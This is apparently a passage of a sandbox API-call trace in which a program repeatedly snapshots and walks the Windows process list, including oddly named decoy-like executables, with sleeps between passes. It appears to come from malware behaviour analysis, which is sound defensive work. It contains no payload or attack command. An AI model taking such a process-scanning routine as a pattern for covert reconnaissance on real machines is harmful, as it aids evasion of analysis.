Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.673] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.674] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.676] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.677] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.678] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.679] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.680] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.681] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.682] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.693] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.696] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0108.697] CloseHandle (hObject=0xbc) returned 1 [0108.697] Sleep (dwMilliseconds=0x12c) [0109.050] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0109.056] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.057] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.058] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.058] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.059] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.061] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.062] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.064] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.065] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.069] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.071] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.163] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.166] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.167] CloseHandle (hObject=0xc4) returned 1 [0109.167] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0109.173] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.223] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.224] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.225] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.225] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.226] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, 